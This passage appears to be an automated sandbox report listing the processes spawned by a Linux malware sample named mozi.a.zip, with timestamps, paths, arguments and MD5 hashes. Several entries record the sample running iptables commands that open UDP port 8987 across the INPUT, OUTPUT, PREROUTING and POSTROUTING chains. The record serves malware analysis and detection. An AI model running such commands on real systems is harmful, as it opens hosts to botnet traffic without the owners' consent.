                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p udp --dport 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:36
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/upstart
                                                                                                                  Arguments:n/a
                                                                                                                  File size:0 bytes
                                                                                                                  MD5 hash:00000000000000000000000000000000

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/date
                                                                                                                  Arguments:date
                                                                                                                  File size:68464 bytes
                                                                                                                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:32
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/usr/share/apport/apport-checkreports
                                                                                                                  Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                                  File size:1269 bytes
                                                                                                                  MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/upstart
                                                                                                                  Arguments:n/a
                                                                                                                  File size:0 bytes
                                                                                                                  MD5 hash:00000000000000000000000000000000

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/date
                                                                                                                  Arguments:date
                                                                                                                  File size:68464 bytes
                                                                                                                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:33
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/usr/share/apport/apport-gtk
                                                                                                                  Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                  File size:23806 bytes
                                                                                                                  MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                                  General

                                                                                                                  Start time:11:35:34
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/upstart
                                                                                                                  Arguments:n/a
                                                                                                                  File size:0 bytes
                                                                                                                  MD5 hash:00000000000000000000000000000000

                                                                                                                  General

                                                                                                                  Start time:11:35:34
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:34
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:34
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/date
                                                                                                                  Arguments:date
                                                                                                                  File size:68464 bytes
                                                                                                                  MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                  General

                                                                                                                  Start time:11:35:35
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:35
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/usr/share/apport/apport-gtk
                                                                                                                  Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                  File size:23806 bytes
                                                                                                                  MD5 hash:ec58a49a30ef6a29406a204f28cc7d87